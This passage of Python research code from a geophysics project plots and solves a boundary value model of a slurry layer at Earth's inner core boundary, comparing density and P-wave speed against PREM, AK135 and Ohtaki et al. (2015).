ax1.set_title('(a)',x=0.95,y=1,fontsize=14)
ax2.set_title('(b)',x=0.95,y=1,fontsize=14)
if saveOn==1:
saveDir='figures/sensitivity/'
if not os.path.exists(saveDir):
os.makedirs(saveDir)
fig1.savefig(saveDir+"temp_oxy.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig1.savefig(saveDir+"temp_oxy.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+"temp_oxy.pdf"))
# %%
def plot_sedimentation(sed_con,saveOn,mol_conc_oxygen_bulk=8,figAspect=0.75):
nSed = sed_con.size
colors=plt.cm.gnuplot_r(np.linspace(0.4,1,nSed))
w, h = plt.figaspect(figAspect)
fig, (ax1,ax2) = plt.subplots(2,1,sharex=True,figsize=(w,2*h))
# Format function for scientific notation in legend
my_fun = mticker.ScalarFormatter(useOffset=False, useMathText=True)
for i in range(nSed):
filename = 'sensitivity/sed_{:.0f}'.format(np.log10(sed_con[i])).replace('.','_')
with open(filename, 'rb') as f:
(radius,temp,xi,solidFlux,density)=pickle.load(f)
# FIX:
# ax1.plot(radius*1e-3,density,label=r'$k_\phi =$ {} $\mathrm{{kgm^{{-3}}s}}$'.format(my_fun.format_data(sed_con[i])),
# color=colors[i])
ax1.plot(radius*1e-3,density,label=r'$k_\phi = {} \mathrm{{kgm^{{-3}}s}}$'.format(my_fun.format_data(sed_con[i])).replace('{','{{').replace('}','}}'),
color=colors[i])
ax1.plot(radius*1e-3,density,color=colors[i])
Kphi = getKphi(sed_con[i],radius,mol_conc_oxygen_bulk)
phi = getphi(Kphi,solidFlux)
ax2.plot(radius*1e-3,phi,color=colors[i])
# PREM
density_prem=premdensity(radius)
ax1.plot(radius*1e-3,density_prem,'k--', label='PREM')
ax1.set(ylabel="Density ($\mathrm{kg m^{-3}}$)") #,yscale="log")
ax2.set(xlabel="Radius (km)",ylabel="Solid fraction",yscale='log')
ax2.axhline(0.6,color='k',linestyle='--') # rheological transition
# labels = ['$k_\phi =${} $\mathrm{{kgm^{{-3}}s}}$'.format(my_fun.format_data(sed_con[i])),
# '1','2','3','4']
fig.legend(loc='center right', bbox_to_anchor=(1.4, 0.5),fontsize = 11.5)
ax1.set_xlim([radius[0]*1e-3,radius[-1]*1e-3])
ax2.set_ylim([1e-4,1])
ax1.set_title('(a)',x=0.95,y=1,fontsize=14)
ax2.set_title('(b)',x=0.95,y=1,fontsize=14)
if saveOn==1:
saveDir='figures/sensitivity/'
if not os.path.exists(saveDir):
os.makedirs(saveDir)
fig.savefig(saveDir+"sedimentation.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+"sedimentation.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+"sedimentation.pdf"))
plt.show()
# %%
def plot_seismic(layer_thickness, thermal_conductivity,
icb_heatflux, csb_heatflux,saveOn,figAspect=0.75):
w, h = plt.figaspect(figAspect)
fig, ax = plt.subplots(1,1,figsize=(1.25*w,1.25*h))
n = layer_thickness.size*thermal_conductivity.size \
*icb_heatflux.size*csb_heatflux.size
if n!=1:
fig_label = [r'high $Le$', r'low $Le$']
start = 0.2
stop = 0.5
cm_subsection = np.linspace(start, stop, n)
colors = [ cm.gray_r(x) for x in cm_subsection ]
# Load data
k=0
for w,x,y,z in [(w,x,y,z) for w in layer_thickness for x in icb_heatflux for y in csb_heatflux for z in thermal_conductivity]:
foldername, filename = get_outputDir(w,x,y,z)
inputDir = "results/{}/{}/".format(foldername,filename)
try:
inputs,outputs,profiles = readdata(inputDir)
except:
print('{} does not exist'.format(inputDir))
return
# Calculate bulk modulus from PREM
bulk_modulus = premvp(profiles.r)**2*premdensity(profiles.r)
# Calculate vp using slurry density and PREM bulk modulus
vp_slurry = np.sqrt(bulk_modulus/profiles.density)
# Calculate FVW P wave speed (Ohtaki et al. 2015, fig 11a)
x = profiles.r/earth_radius
vp_fvw = 3.3*x[0]-3.3*x +10.33
max_diff = np.max((vp_fvw-vp_slurry*1e-3)/vp_fvw*100)
print('Maximum difference with Ohtaki et al. (2015) is {:.2f}%'.format(max_diff))
max_diff = np.max((premvp(profiles.r)-vp_slurry)/premvp(profiles.r)*100)
print('Maximum difference with PREM is {:.2f}%'.format(max_diff))
print('Density on slurry side of ICB is {:.2f}'.format(profiles.density[0]))
density_jump = profiles.density[0] - profiles.density.iloc[-1]
print('Density jump is {:.2f}'.format(density_jump))
rho_bod = density_solidFe - profiles.density[0]
print('Delta rho bod is {:.2f}'.format(rho_bod))
rho_mod = rho_bod + density_jump
print('Delta rho mod is {:.2f}'.format(rho_mod))
# Plot P wave speed
if n==1:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color='darkgrey',lw=2,label='slurry') #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color='darkgrey',lw=2)
else:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color=colors[k],lw=2,label=fig_label[k]) #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color=colors[k],lw=2)
# Check density
# ax1.plot(profiles.r*1e-3,premdensity(profiles.r),'k--')
# ax1.plot(profiles.r*1e-3,profiles.density)
k+=1
# Look up AK135
radius_ak135 = ak135radius()
vp_ak135 = ak135vp(radius_ak135)
# Plot FVW, PREM and AK135
ax.plot(profiles.r*1e-3,vp_fvw,color='blue',lw=2,ls=':',label='Ohtaki et al. (2015)')
ax.vlines(profiles.r[0]*1e-3,vp_fvw[0],10.4,color='blue',lw=2,ls=':')
ax.plot(profiles.r*1e-3,premvp(profiles.r)*1e-3,color='k',ls='--',label='PREM')
ax.vlines(profiles.r[0]*1e-3,premvp(profiles.r[0])*1e-3,10.4, 'k', linestyle='--')
ax.plot(radius_ak135*1e-3,vp_ak135*1e-3,'k',label='ak135')
ax.vlines(radius_ak135[0]*1e-3,vp_ak135[0]*1e-3,10.4, 'k')
ax.legend(loc = 0, fontsize=11.5)
ax.set(xlabel="Radius (km)")
ax.set(ylabel="P wave speed (km/s)")
ax.set_xlim([1200,profiles.r.iloc[-1]*1e-3])
ax.set_ylim([10.25,10.4])
major_xticks = np.arange(1200,1370,20)
minor_xticks = np.arange(1200,1370,5)
major_yticks = np.arange(10.25,10.4,0.05)
minor_yticks = np.arange(10.25,10.4,0.01)
ax.set_xticks(major_xticks)
ax.set_xticks(minor_xticks, minor=True)
ax.set_yticks(major_yticks)
ax.set_yticks(minor_yticks, minor=True)
ax.grid(which='minor', alpha=0.2)
ax.grid(which='major', alpha=0.5)
ax.tick_params(which='major',length = 7)
ax.tick_params(which='minor',length = 3.5)
if saveOn==1:
saveDir='figures/seismic/'
if not os.path.exists(saveDir+foldername):
os.makedirs(saveDir+foldername)
fig.savefig(saveDir+foldername+"/"+filename+".pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+foldername+"/"+filename+".png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+foldername+"/"+filename+".pdf"))
plt.show()
return profiles.r, vp_slurry, profiles.density, vp_fvw
# %%
def plot_seismic_dark(layer_thickness, thermal_conductivity,
icb_heatflux, csb_heatflux,saveOn,figAspect=0.75):
w, h = plt.figaspect(figAspect)
fig, ax = plt.subplots(1,1,figsize=(1.25*w,1.25*h))
n = layer_thickness.size*thermal_conductivity.size \
*icb_heatflux.size*csb_heatflux.size
if n!=1:
fig_label = [r'high $Le$', r'low $Le$']
start = 0.2
stop = 0.5
cm_subsection = np.linspace(start, stop, n)
colors = [ cm.gray_r(x) for x in cm_subsection ]
# Load data
k=0
for w,x,y,z in [(w,x,y,z) for w in layer_thickness for x in icb_heatflux for y in csb_heatflux for z in thermal_conductivity]:
foldername, filename = get_outputDir(w,x,y,z)
inputDir = "results/{}/{}/".format(foldername,filename)
try:
inputs,outputs,profiles = readdata(inputDir)
except:
print('{} does not exist'.format(inputDir))
return
# Calculate bulk modulus from PREM
bulk_modulus = premvp(profiles.r)**2*premdensity(profiles.r)
# Calculate vp using slurry density and PREM bulk modulus
vp_slurry = np.sqrt(bulk_modulus/profiles.density)
# Calculate FVW P wave speed (Ohtaki et al. 2015, fig 11a)
x = profiles.r/earth_radius
vp_fvw = 3.3*x[0]-3.3*x +10.33
max_diff = np.max((vp_fvw-vp_slurry*1e-3)/vp_fvw*100)
print('Maximum difference with Ohtaki et al. (2015) is {:.2f}%'.format(max_diff))
max_diff = np.max((premvp(profiles.r)-vp_slurry)/premvp(profiles.r)*100)
print('Maximum difference with PREM is {:.2f}%'.format(max_diff))
print('Density on slurry side of ICB is {:.2f}'.format(profiles.density[0]))
density_jump = profiles.density[0] - profiles.density.iloc[-1]
print('Density jump is {:.2f}'.format(density_jump))
rho_bod = density_solidFe - profiles.density[0]
print('Delta rho bod is {:.2f}'.format(rho_bod))
rho_mod = rho_bod + density_jump
print('Delta rho mod is {:.2f}'.format(rho_mod))
# Plot P wave speed
if n==1:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color='darkgrey',lw=2,label='slurry') #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color='darkgrey',lw=2)
else:
ax.plot(profiles.r*1e-3,vp_slurry*1e-3,color=colors[k],lw=2,label=fig_label[k]) #(km/s)
ax.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color=colors[k],lw=2)
# Check density
# ax1.plot(profiles.r*1e-3,premdensity(profiles.r),'k--')
# ax1.plot(profiles.r*1e-3,profiles.density)
k+=1
# Look up AK135
radius_ak135 = ak135radius()
vp_ak135 = ak135vp(radius_ak135)
ax.plot(profiles.r*1e-3,vp_fvw,color='blue',lw=2,ls=':',label='Ohtaki et al. (2015)')
ax.vlines(profiles.r[0]*1e-3,vp_fvw[0],10.4,color='blue',lw=2,ls=':')
ax.plot(profiles.r*1e-3,premvp(profiles.r)*1e-3,color='white',ls='--',label='PREM')
ax.vlines(profiles.r[0]*1e-3,premvp(profiles.r[0])*1e-3,10.4, 'white', linestyle='--')
ax.plot(radius_ak135*1e-3,vp_ak135*1e-3,'white',label='ak135')
ax.vlines(radius_ak135[0]*1e-3,vp_ak135[0]*1e-3,10.4, 'white')
ax.legend(fontsize=11.5)
ax.set(xlabel="Radius (km)")
ax.set(ylabel="P wave speed (km/s)")
ax.set_xlim([1200,profiles.r.iloc[-1]*1e-3])
ax.set_ylim([10.1,10.4])
plt.yticks(np.arange(10.1,10.41,0.1))
if saveOn==1:
saveDir='figures/seismic/'
if not os.path.exists(saveDir+foldername):
os.makedirs(saveDir+foldername)
fig.savefig(saveDir+foldername+"/"+filename+"_dark.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+foldername+"/"+filename+"_dark.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+foldername+"/"+filename+".pdf"))
plt.show()
return profiles.r, vp_slurry, profiles.density
# %%
def plot_compare(layer_thickness,csb_heatflux,icb_heatflux,thermal_conductivity,
saveOn,saveTag,mol_conc_oxygen_bulk=8.,mol_conc_SSi=8.,
self_diffusion=0.98e-8,aspectRatio=0.75,tempMin=5400,
tempMax = 5800,xiMin = 6,xiMax = 8,jMin = -3.5e-7,jMax = 0,
denMin=11900,denMax = 12250):
w,h= plt.figaspect(aspectRatio)*2
fig=plt.figure()
fig, ((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2,sharex=True,figsize=(w,h))
colors = plt.cm.tab10(np.linspace(0,1,layer_thickness.size))
plt.rcParams["axes.prop_cycle"] = plt.cycler("color", plt.cm.tab10.colors)
for i in (range(layer_thickness.size)):
foldername,filename = get_outputDir(layer_thickness[i],icb_heatflux,
csb_heatflux,thermal_conductivity)
inputDir=foldername+"/"+filename
data_in,data_out,data_profiles=readdata(inputDir)
radius=(data_profiles['r'])*1e-3
oxygen=data_profiles['oxygen']
(mass_conc_O,acore) =getcsbmassoxygen(data_in.oxygen_bulk)
acore=float(acore)
ax1.plot(radius,data_profiles['temp'],label='_nolegend_')#, color=colors[i])
ax2.plot(radius,oxygen*acore/aO*100)#, color=colors[i])
ax3.plot(radius,data_profiles['solidflux'])#,color=colors[i])
ax4.plot(radius,data_profiles['density'],
label='{:.0f} km'.format(layer_thickness[i]*1e-3))#,color=colors[i])
# Liquidus
radius_liquidus=np.linspace(icb_radius,icb_radius+400e3)
temp_liquidus=liquidus(radius_liquidus)
ax1.plot(radius_liquidus*1e-3,temp_liquidus,'k--',label = 'Liquidus (Davies et al. 2015)')
# PREM
radius_prem=np.linspace(icb_radius,icb_radius+400e3)
density_prem=premdensity(radius_prem)
ax4.plot(radius_prem*1e-3,density_prem,'k--',label='PREM')
ax4.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
# Axis titles
ax1.set(ylabel="Temperature (K)")
ax2.set(ylabel="Oxygen (mol.%)")
ax3.set(xlabel="Radius (km)",ylabel="Solid flux ($\mathrm{kg m^{-2} s^{-1}}$)")
# Legend
ax1.legend(fontsize=11.5,loc=1)
ax4.legend(fontsize=11.5,loc=1)
# Axis limits
ax1.set_ylim([tempMin,tempMax])
ax2.set_ylim([xiMin,xiMax])
ax3.set_ylim([jMin,jMax])
ax4.set_ylim([denMin,denMax])
ax1.set_xlim([1220,(icb_radius+400e3)*1e-3])
# Subfigure labels
ax1.text(1225,tempMax-23,'(a)',fontsize=14)
ax2.text(1225,xiMax - 0.12,'(b)',fontsize=14)
ax3.text(1225,jMax - .2e-7,'(c)',fontsize=14)
ax4.text(1225,denMax - 20,'(d)',fontsize=14)
plt.tight_layout()
if saveOn==1:
if not os.path.exists('figures/profiles'):
os.makedirs('figures/profiles')
saveName=foldername+"_"+filename+saveTag
plt.savefig('figures/profiles/'+saveName+'.pdf',format='pdf',dpi=200)
plt.show()
# %%
def plot_CD(layer_thickness, thermal_conductivity,
icb_heatflux, csb_heatflux,saveOn,figAspect=0.75):
w, h = plt.figaspect(figAspect)
# fig, (ax1,ax2,ax3) = plt.subplots(3,1,figsize=(1.25*w,1.25*h),sharex=True)
fig = plt.figure(constrained_layout=True,figsize=(1.25*w,2*h))
spec = gridspec.GridSpec(ncols=1, nrows=3, figure=fig)
ax1 = fig.add_subplot(spec[0, 0])
ax2 = ax1.twinx()
ax3 = fig.add_subplot(spec[1, 0],sharex=ax1)
n = layer_thickness.size*thermal_conductivity.size \
*icb_heatflux.size*csb_heatflux.size
if n!=1:
fig_label = [r'high $Le$', r'low $Le$']
start = 0.2
stop = 0.5
cm_subsection = np.linspace(start, stop, n)
colors = [ cm.gray_r(x) for x in cm_subsection ]
# Load data
k=0
for w,x,y,z in [(w,x,y,z) for w in layer_thickness for x in icb_heatflux for y in csb_heatflux for z in thermal_conductivity]:
foldername, filename = get_outputDir(w,x,y,z)
inputDir = "results/{}/{}/".format(foldername,filename)
try:
inputs,outputs,profiles = readdata(inputDir)
except:
print('{} does not exist'.format(inputDir))
return
# Calculate bulk modulus from PREM
bulk_modulus = premvp(profiles.r)**2*premdensity(profiles.r)
# Calculate vp using slurry density and PREM bulk modulus
vp_slurry = np.sqrt(bulk_modulus/profiles.density)
# Calculate FVW P wave speed (Ohtaki et al. 2015, fig 11a)
x = profiles.r/earth_radius
vp_fvw = 3.3*x[0]-3.3*x +10.33
max_diff = np.max((vp_fvw-vp_slurry*1e-3)/vp_fvw*100)
print('Maximum difference with Ohtaki et al. (2015) is {:.2f}%'.format(max_diff))
max_diff = np.max((premvp(profiles.r)-vp_slurry)/premvp(profiles.r)*100)
print('Maximum difference with PREM is {:.2f}%'.format(max_diff))
print('Density on slurry side of ICB is {:.2f}'.format(profiles.density[0]))
density_jump = profiles.density[0] - profiles.density.iloc[-1]
print('Density jump is {:.2f}'.format(density_jump))
rho_bod = density_solidFe - profiles.density[0]
print('Delta rho bod is {:.2f}'.format(rho_bod))
rho_mod = rho_bod + density_jump
print('Delta rho mod is {:.2f}'.format(rho_mod))
# Plot P wave speed
if n==1:
ax3.plot(profiles.r*1e-3,vp_slurry*1e-3,color='darkgrey',lw=2,label='slurry density') #(km/s)
ax3.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color='darkgrey',lw=2)
else:
ax3.plot(profiles.r*1e-3,vp_slurry*1e-3,color=colors[k],lw=2,label=fig_label[k]) #(km/s)
ax3.vlines(profiles.r[0]*1e-3,vp_slurry[0]*1e-3,10.4,color=colors[k],lw=2)
# Check density
# ax3.plot(profiles.r*1e-3,premdensity(profiles.r),'k--')
# ax3.plot(profiles.r*1e-3,profiles.density)
k+=1
# Plot temperature and composition
ax1.plot(profiles.r*1e-3,profiles.temp,lw=2,color='red',label='temperature')
(mass_conc_O,acore) = getcsbmassoxygen(inputs.oxygen_bulk)
acore=float(acore)
ax2.plot(profiles.r*1e-3,profiles.oxygen*acore/aO*100,lw=2,color='blue',label='oxygen')
# Plot FVW, PREM and AK135
ax3.plot(profiles.r*1e-3,vp_fvw,color='black',lw=2,ls=':',label='Ohtaki et al. (2015)')
ax3.vlines(profiles.r[0]*1e-3,vp_fvw[0],10.4,color='black',ls=':',lw=2)
ax3.plot(profiles.r*1e-3,premvp(profiles.r)*1e-3,color='k',ls='--',label='PREM')
ax3.vlines(profiles.r[0]*1e-3,premvp(profiles.r[0])*1e-3,10.4, 'k', linestyle='--')
# ax3.plot(radius_ak135*1e-3,vp_ak135*1e-3,'k',label='ak135')
# ax3.vlines(radius_ak135[0]*1e-3,vp_ak135[0]*1e-3,10.4, 'k')
ax3.legend(fontsize=11.5, loc='upper right')
ax1.set(ylabel="Temperature (K)")
ax1.spines["right"].set_edgecolor('red')
ax1.spines["right"].set_edgecolor('blue')
ax1.yaxis.label.set_color('red')
ax2.set(ylabel="Oxygen (mol.%)")
ax2.spines["left"].set_edgecolor('red')
ax2.spines["right"].set_edgecolor('blue')
ax2.yaxis.label.set_color('blue')
ax2.tick_params(axis='y', colors='blue')
ax1.tick_params(axis='y', which='both', colors='red')
ax3.set(xlabel="Radius (km)")
ax3.set(ylabel="P wave speed (km/s)")
ax3.set_xlim([1200,profiles.r.iloc[-1]*1e-3])
ax3.set_ylim([10.25,10.4])
major_xticks = np.arange(1200,1370,20)
minor_xticks = np.arange(1200,1370,5)
ax1.set_xticks(major_xticks)
ax1.set_xticks(minor_xticks, minor=True)
ax2.set_xticks(major_xticks)
ax2.set_xticks(minor_xticks, minor=True)
ax3.set_xticks(major_xticks)
ax3.set_xticks(minor_xticks, minor=True)
major_yticks = np.arange(5500,5751,100)
minor_yticks = np.arange(5500,5751,20)
ax1.set_yticks(major_yticks)
ax1.set_yticks(minor_yticks, minor=True)
ax1.grid(which='minor', alpha=0.2)
ax1.grid(which='major', alpha=0.5)
ax1.tick_params(which='major',length = 7)
ax1.tick_params(which='minor',length = 3.5)
# major_yticks = np.arange(6.5,8.1,0.5)
# minor_yticks = np.arange(6.5,8.1,0.1)
# ax2.set_yticks(major_yticks)
# ax2.set_yticks(minor_yticks, minor=True)
# ax2.grid(which='minor', alpha=0.2)
# ax2.grid(which='major', alpha=0.5)
# ax2.tick_params(which='major',length = 7)
# ax2.tick_params(which='minor',length = 3.5)
major_yticks = np.arange(10.25,10.4,0.05)
minor_yticks = np.arange(10.25,10.4,0.01)
ax3.set_yticks(major_yticks)
ax3.set_yticks(minor_yticks, minor=True)
ax3.grid(which='minor', alpha=0.2)
ax3.grid(which='major', alpha=0.5)
ax3.tick_params(which='major',length = 7)
ax3.tick_params(which='minor',length = 3.5)
if saveOn==1:
saveDir='figures/seismic/'
if not os.path.exists(saveDir+foldername):
os.makedirs(saveDir+foldername)
fig.savefig(saveDir+foldername+"/"+filename+"_CD.pdf",format='pdf', dpi=200, bbox_inches='tight')
fig.savefig(saveDir+foldername+"/"+filename+"_CD.png",format='png', dpi=200, bbox_inches='tight')
print('Figure saved as {}'.format(saveDir+foldername+"/"+filename+"_CD.pdf"))
plt.show()
return profiles.r, vp_slurry, profiles.density, vp_fvw
```
#### File: nondim-slurry/slurpy/slurry.py
```python
import numpy as np
import os
import pandas as pd
import slurpy.getparameters as gp
# import slurpy.coreproperties as cp
import slurpy.lookup as lp
import slurpy.data_utils as sp
from scipy.integrate import solve_bvp
from slurpy.coreproperties import icb_radius, deltaV_solidFe_liquidFe, \
density_solidFe, heat_capacity, latent_heat, year
def solveslurry(layer_thickness, icb_heatflux, csb_heatflux, thermal_conductivity, \
csb_temp, h, mol_conc_oxygen_bulk=8, sedimentation_constant=1e-2,
self_diffusion=0.98e-8, mol_conc_SSi=8, model = 'prem', \
initial_F=5, initial_icAge=0.5, maxSt=6, n=100,
tolerance=1e-3,nmax=2e4):
# %% Nested functions to define BVP
def fun(r,y,p):
# Eigenvalues
F=p[0]
speed=p[1]
# PREM gravity and density in layer
if model =='prem':
density_seis=lp.premdensity(r*csb_radius)/density0 # dimensionless density
elif model == 'ohtaki':
_,density_seis = lp.ohtaki(r*csb_radius)/density0
gravity_seis=lp.premgravity(r*csb_radius)/csb_gravity # dimensionless gravity
density_grad_seis=np.gradient(density_seis,r)
gravity_grad_seis=np.gradient(gravity_seis,r)
# r derivative of barodiffusion term
term=gravity_seis*density_seis*np.exp(F*(csb_radius*r-icb_radius)/layer_thickness)* \
(F*csb_radius/layer_thickness+2/r-y[3]/y[0]+ \
gravity_grad_seis/gravity_seis+density_grad_seis/density_seis)/y[0]
# liquidus (=dxi/dr)
eq1=-(Lip*density_seis*gravity_seis+y[3]/y[0])*Rrho/(Lix*St*y[0])
# oxygen eqn (=dj/dr)
eq2=(Lip*Rrho*term/(Lix*St*Pe*Rvol) - eq1*(Rrho*speed+y[2]) - \
2*y[1]*y[2]/r)/y[1]
# temp eqn (=d2T/dr2)
eq3=-Pe/Le*((eq2+2/r*y[2])/St + \
(speed+2*Le/(r*Pe))*y[3])
return np.vstack([y[3],eq1,eq2,eq3])
def bcs(ya,yb,p):
speed = p[1]
return np.array([
yb[0]-csb_temp*heat_capacity*Rrho/(St*latent_heat), # CSB temp
yb[1]-1, # CSB xi
ya[2]+speed, # ICB solid flux
yb[2], # CSB solid flux
ya[3]+Pe/(St*Le), # ICB heat flux
yb[3]+Pe/Le # CSB heat flux
])
def ics(y):
y[0,:]=csb_temp*heat_capacity*Rrho/(St*latent_heat), # temperature
y[1,:]=1, # oxygen
y[2,:]=-initial_speed, # solid flux
y[3,:]=-Pe/Le # temp gradient
return y
# Define initial conditions using previous solution
def ic_old(y):
y[0,:]=np.reshape(temp0,(1,n)) # temperature
y[1,:]=np.reshape(xi0,(1,n)) # oxygen
y[2,:]=np.reshape(solid_flux0,(1,n)) # solid flux
y[3,:]=np.reshape(temp_grad0,(1,n)) # temp gradient
return y
# %% DIMENSIONLESS NUMBERS
csb_radius=gp.getcsbradius(layer_thickness)
mass_conc_O,acore=gp.getcsbmassoxygen(mol_conc_oxygen_bulk)
init_snow_speed=gp.getsnowspeed(initial_icAge) # initial guess
freezing_speed=gp.getfreezingspeed(icb_heatflux)
initial_speed = (init_snow_speed + freezing_speed)/freezing_speed # dimensionless
Lip,csb_gravity,density0=gp.getLip(csb_radius,model)
Lix=gp.getLix(mass_conc_O)
St=gp.getStefan(icb_heatflux,csb_heatflux,csb_radius)
deltaV_liquidFeO_solidFe=gp.getchangevolmelting(mol_conc_oxygen_bulk,density0)
Le=gp.getLewis(thermal_conductivity,self_diffusion,density0)
Pe=gp.getPeclet(freezing_speed,csb_radius,self_diffusion)
Rrho=density0/density_solidFe
Rvol = deltaV_solidFe_liquidFe/deltaV_liquidFeO_solidFe
scale_temp = gp.get_tempScale(csb_heatflux,csb_radius,density0,freezing_speed)
scale_xi = mass_conc_O
scale_j = gp.get_jScale(freezing_speed)
# %% OUTPUT DIRECTORY
str1=str(np.round(Le,2)).replace('.','_')
str2=str(np.round(Lip,2)).replace('.','_')
str3=str(np.round(Lix,2)).replace('.','_')
str4=str(np.round(Pe,2)).replace('.','_')
str5=str(np.round(St,2)).replace('.','_')
if model == 'ohtaki':
outputDir="ohtaki/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
else:
outputDir="results/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
# Make directory if it doesn't exist
if not os.path.exists(outputDir):
os.makedirs(outputDir)
# Ignore cases where csb heat flux is smaller than icb heat flux
elif csb_heatflux < icb_heatflux:
return (outputDir,0,0,0,0,0)
# Impose upper limit on St
elif St> maxSt:
return (outputDir,0,0,0,0,0)
# Skip if directory already exists
# else:
# return (outputDir,0,0,0,0,0)
# Load previous solution to initialise
# Previous Stefan number
m=1
state=2
initOn=0
# FIX: loop back through all of St before Pe
while state == 2:
try:
csb_heatflux_old=csb_heatflux-m*h
St_old=gp.getStefan(icb_heatflux,csb_heatflux_old,csb_radius)
str5=str(np.round(St_old,2)).replace('.','_')
inputDir="results/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
data_output=pd.read_csv(inputDir+"outputs.csv",index_col=False)
state = np.float(data_output['state'])
m=m+1
initOn=1
except FileNotFoundError:
# Previous Peclet number
m=1
state=2
while state == 2:
try:
icb_heatflux_old = icb_heatflux-m*h
freezing_speed_old=gp.getfreezingspeed(icb_heatflux_old)
Pe_old=gp.getPeclet(freezing_speed_old,csb_radius,self_diffusion)
St_old=gp.getStefan(icb_heatflux_old,csb_heatflux,csb_radius)
str4=str(np.round(Pe_old,2)).replace('.','_')
str5=str(np.round(St_old,2)).replace('.','_')
inputDir="results/Le_{}/Lip_{}_Lix_{}_Pe_{}_St_{}/".format(str1,str2,str3,str4,str5)
data_output=pd.read_csv(inputDir+"outputs.csv",index_col=False)
state = np.float(data_output['state'])
m=m+1
initOn=2
except FileNotFoundError:
initOn=0
break
break
# Read csv data
if initOn!=0:
data_profile=pd.read_csv(inputDir+"profiles.csv",index_col=False)
temp0=np.array(data_profile['temp'])
xi0=np.array(data_profile['oxygen'])
solid_flux0=np.array(data_profile['solidflux'])
temp_grad0=np.array(data_profile['temp_grad'])
initial_F=np.float(data_output['F'])
snow_speed=np.float(data_output['snowSpeed'])
initial_speed=np.float(data_output['icbSpeed'])
freezing_speed_old=initial_speed-snow_speed
n=temp0.size
# Non-dimensionalise initial guess
scale_tempOld = gp.get_tempScale(csb_heatflux_old,csb_radius,density0,
freezing_speed)
scale_jOld=gp.get_jScale(freezing_speed_old)
temp0=temp0/scale_tempOld
xi0=xi0/scale_xi
solid_flux0=solid_flux0/scale_jOld
temp_grad0=temp_grad0/scale_tempOld*csb_radius
# %% MESH
r=np.linspace(icb_radius/csb_radius,1,n)
y=np.zeros((4,r.size)) # pre-allocate soln array
# %% BOUNDARY VALUE PROBLEM
# Run solver - default solver tolerance is 1e-3, default max nodes is 1000
if initOn!=0:
print('Initialised with {}'.format(inputDir))
sol=solve_bvp(fun,bcs,r,ic_old(y),p=[initial_F,initial_speed],tol=tolerance,verbose=2,max_nodes=nmax)
elif initOn==0:
print('No initialisation')
sol=solve_bvp(fun,bcs,r,ics(y),p=[initial_F,initial_speed],tol=tolerance,verbose=2,max_nodes=nmax)
# If initialisation gives no soln then try no initialisation
if initOn!=0 and sol.status!=0:
print('Status = {} - Try again without initialisation'.format(sol.status))
sol=solve_bvp(fun,bcs,r,ics(y),p=[initial_F,initial_speed],tol=tolerance,verbose=2,max_nodes = nmax)
if sol.status==2:
state=2
print("Singular Jacobian encountered")
elif sol.status==1:
state=1
print("Maximum number of mesh nodes exceeded")
else:
state=0
print("Converged")
# %% OUTPUT
F_out=sol.p[0]
icb_speed_out=sol.p[1]*freezing_speed
snow_speed_out = icb_speed_out - freezing_speed
ic_age_out=gp.geticage(icb_speed_out)
print("Mixing parameter is %.2f" % F_out)
print("Freezing speed is {:.2e} m/s = {:.3f} mm/yr".format(freezing_speed,freezing_speed*1e3*year))
print("ICB speed is {:.2e} m/s = {:.3f} mm/yr".format(icb_speed_out,icb_speed_out*1e3*year))
print("IC age is %.2f Ga" % ic_age_out)
# Nondimensional to dimensional
r_out = sol.x*csb_radius
temp_out = sol.y[0,:]*scale_temp
xi_out= sol.y[1,:]*scale_xi
j_out= sol.y[2,:]*scale_j
j_out[-1]=0. # BVP minimises j to be close to, but not exactly zero at the CSB
temp_grad_out= sol.yp[0,:]*scale_temp/csb_radius
xi_grad_out= sol.yp[1,:]*scale_xi/csb_radius
j_grad_out=sol.yp[2,:]*scale_j/csb_radius
# %% POST-PROCESS
# Slurry density
density,phi_out,temp_denFluc,xi_denFluc,phi_denFluc,density_fluc= \
gp.slurrydensity(r_out,temp_out,xi_out,j_out, \
mol_conc_oxygen_bulk,sedimentation_constant,model=model)
density_jump=density[0]-density[-1]
print("Density jump is {:.2f} kg/m^-3".format(density_jump))
# Stable layer?
density_fluc_grad = np.gradient(density_fluc,r_out)
unstable = density_fluc_grad[density_fluc_grad>0]
if unstable.size!=0:
print('Unstable slurry')
else:
print('Stable slurry')
# Heat balance
(Q_cmb, Qs, Qs_slurry, Qs_oc, Ql, Qg, Qg_oc, Qg_slurry, cooling_rate_out,
cmb_temp, temp_ad) = gp.heatflux(r_out,temp_out,xi_out,j_out,phi_out, \
temp_grad_out,xi_grad_out, density, \
icb_speed_out,icb_heatflux*1e12,
layer_thickness,thermal_conductivity,csb_heatflux*1e12,n)
# %% SAVE
sp.saveprofiles(outputDir,r_out,temp_out,xi_out,j_out,phi_out,density, \
temp_grad_out,xi_grad_out,j_grad_out,temp_denFluc,xi_denFluc, \
phi_denFluc,density_fluc)
sp.saveinputs(outputDir,n,layer_thickness,thermal_conductivity,icb_heatflux, \
csb_heatflux, mol_conc_oxygen_bulk,mol_conc_SSi, \
self_diffusion,sedimentation_constant)
